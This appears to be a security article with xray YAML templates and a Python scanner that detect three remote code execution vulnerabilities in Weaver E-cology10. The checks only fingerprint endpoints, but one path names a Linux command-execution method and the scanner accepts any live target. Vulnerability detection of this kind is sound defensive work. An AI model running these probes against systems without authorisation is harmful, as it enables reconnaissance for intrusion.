
Weaver E-cology10 xmReport, dubboApi and saveSignAddrsInfo Remote Code Execution Vulnerability PoCs


Weaver E-cology10 xmReport remote code execution vulnerability

name: poc-yaml-weaver-ecology10-archive-rce
transport: http

rules:

  r0:
    request:
      method: GET
      path: /papi/archive/aux/xmReport/preview
    expression: |-
      response.status == 405 && response.body_string.contains('"error":"Method Not Allowed"')
      && response.body_string.contains('"path":"/papi/archive/aux/xmReport/preview"')

  r1:
    request:
      method: POST
      path: /papi/archive/aux/xmReport/preview
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: ""
    expression: |-
      response.status == 200 && response.body_string.contains('"code":500')
      && response.body_string.contains('"msg":"系统错误"')
      && response.body_string.contains('"status":false')
      && response.body_string.contains('"fail":true')


expression: r0() && r1()

Weaver E-cology10 dubboApi remote code execution vulnerability

name: poc-yaml-weaver-ecology10-dubbo-debug-rce
transport: http

rules:
  r1:
    request:
      method: POST
      path: /papi/esearch/data/devops/dubboApi/debug/method?interfaceName=com.weaver.dw.platform.spark.util.LinuxCommand&methodName=execCmdWaitStdOut
      headers:
        Content-Type: application/json
      body: '[]'
    expression: >
      response.status == 200 && response.body_string.contains('"code":500')
      && response.body_string.contains('"msg":"系统错误"')
      && response.body_string.contains('"status":false')
      && response.body_string.contains('"fail":true')
expression: r1()

Weaver E-cology10 saveSignAddrsInfo remote code execution vulnerability

name: poc-yaml-weaver-ecology10-hessian-rce

transport: http

set:
  key: randomLowercase(12)

rules:

  r1:
    request:
      method: POST
      path: /papi/calendar/saveSignAddrsInfo
      headers:
        Content-Type: application/json; charset=utf-8
      body: >
        {}
    expression: response.status == 200 && response.body_string.contains('"data":"缺少参数或者参数错误"')

  r2:
    request:
      method: GET
      path: /papi/calendar/getSignAddrsInfo?key=r_
    expression: response.status == 200 && response.body_string.contains('"msg":"接口返回成功"') && response.body_string.contains('"status":true')

expression: r1() && r2()
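The three PoCs above share one shape: send a fixed request, then require a status code plus a set of substrings in the body. The script below is an added example, not the author's YAML or any Weaver code: it transcribes the three rule sets into plain Python so they can be run without xray, and it keeps the same `r0() && r1()` short-circuit semantics. Note what these rules actually assert: none of them sends a payload, so a match only shows that the endpoint exists and answers with the error shape the PoC expects (the 405 JSON, the `"code":500` "系统错误" body, the calendar API's "缺少参数或者参数错误" reply); it does not demonstrate command execution. The helper names (`Rule`, `run_poc`, `scan`, `urllib_sender`, `fake_sender`) and the canned responses in `FAKE_RESPONSES` are this example's own constructions, not captures from a real host.

```python
import json
import urllib.error
import urllib.request
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Tuple

Response = Tuple[int, str]  # (HTTP status, body decoded as text)
Sender = Callable[[str, str, Dict[str, str], Optional[str]], Response]

DUBBO_PATH = ("/papi/esearch/data/devops/dubboApi/debug/method"
              "?interfaceName=com.weaver.dw.platform.spark.util.LinuxCommand"
              "&methodName=execCmdWaitStdOut")
ERR500 = ['"code":500', '"msg":"系统错误"', '"status":false', '"fail":true']


@dataclass
class Rule:
    """One xray rule: a request plus the status/body substrings it must match."""
    name: str
    method: str
    path: str
    headers: Dict[str, str] = field(default_factory=dict)
    body: Optional[str] = None
    status: int = 200
    needles: List[str] = field(default_factory=list)  # every one must appear

    def matches(self, resp: Response) -> bool:
        code, text = resp
        return code == self.status and all(n in text for n in self.needles)


# The three PoCs on this page, transcribed rule by rule.
POCS: Dict[str, List[Rule]] = {
    "poc-yaml-weaver-ecology10-archive-rce": [
        Rule("r0", "GET", "/papi/archive/aux/xmReport/preview", status=405,
             needles=['"error":"Method Not Allowed"',
                      '"path":"/papi/archive/aux/xmReport/preview"']),
        Rule("r1", "POST", "/papi/archive/aux/xmReport/preview",
             headers={"Content-Type": "application/x-www-form-urlencoded"},
             body="", needles=ERR500),
    ],
    "poc-yaml-weaver-ecology10-dubbo-debug-rce": [
        Rule("r1", "POST", DUBBO_PATH,
             headers={"Content-Type": "application/json"}, body="[]", needles=ERR500),
    ],
    "poc-yaml-weaver-ecology10-hessian-rce": [
        Rule("r1", "POST", "/papi/calendar/saveSignAddrsInfo",
             headers={"Content-Type": "application/json; charset=utf-8"},
             body="{}", needles=['"data":"缺少参数或者参数错误"']),
        Rule("r2", "GET", "/papi/calendar/getSignAddrsInfo?key=r_",
             needles=['"msg":"接口返回成功"', '"status":true']),
    ],
}


def run_poc(rules: List[Rule], send: Sender) -> bool:
    """Same as the page's top-level ``expression: r0() && r1()``: rules run in
    order and the first non-matching response short-circuits to False."""
    for rule in rules:
        if not rule.matches(send(rule.method, rule.path, rule.headers, rule.body)):
            return False
    return True


def scan(send: Sender) -> Dict[str, bool]:
    """Run every PoC through the given transport; report which ones matched."""
    return {name: run_poc(rules, send) for name, rules in POCS.items()}


def urllib_sender(base_url: str, timeout: float = 10.0) -> Sender:
    """Live transport. 405/500 replies carry the bodies the rules look for, so
    HTTPError is returned as a normal (status, body) pair instead of raised."""
    def send(method, path, headers, body):
        data = body.encode("utf-8") if body is not None else None
        req = urllib.request.Request(base_url.rstrip("/") + path, data=data,
                                     headers=headers, method=method)
        try:
            with urllib.request.urlopen(req, timeout=timeout) as r:
                return r.status, r.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as e:
            return e.code, e.read().decode("utf-8", "replace")
    return send


def _j(obj: dict) -> str:
    # Compact JSON: the exact form the page's contains() needles expect.
    return json.dumps(obj, ensure_ascii=False, separators=(",", ":"))


# Constructed responses (not captured from any real host), shaped like the
# bodies the page's expressions match, so the checks can run offline.
FAKE_RESPONSES: Dict[Tuple[str, str], Response] = {
    ("GET", "/papi/archive/aux/xmReport/preview"):
        (405, _j({"error": "Method Not Allowed",
                  "path": "/papi/archive/aux/xmReport/preview"})),
    ("POST", "/papi/archive/aux/xmReport/preview"):
        (200, _j({"code": 500, "msg": "系统错误", "status": False, "fail": True})),
    ("POST", DUBBO_PATH):
        (200, _j({"code": 500, "msg": "系统错误", "status": False, "fail": True})),
    ("POST", "/papi/calendar/saveSignAddrsInfo"):
        (200, _j({"data": "缺少参数或者参数错误", "status": False})),
    ("GET", "/papi/calendar/getSignAddrsInfo?key=r_"):
        (200, _j({"msg": "接口返回成功", "status": True, "data": []})),
}


def fake_sender(method, path, headers, body) -> Response:
    """Offline transport: unknown endpoints answer 404 with an empty body."""
    return FAKE_RESPONSES.get((method, path), (404, ""))


if __name__ == "__main__":
    print(scan(fake_sender))  # swap in urllib_sender("https://host") for a live target
```

To run against a real host, pass `urllib_sender("https://target")` to `scan` instead of `fake_sender`; the transport is injected precisely so the matching logic can be exercised offline and the live client swapped in unchanged. Because every rule is a substring match on the body, a host that returns the same error JSON for unrelated reasons (a WAF, a generic error page) will also satisfy `r1` of the first two PoCs, so treat a hit as "endpoint present", not "exploitable".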

This article is licensed by the author under CC BY 4.0.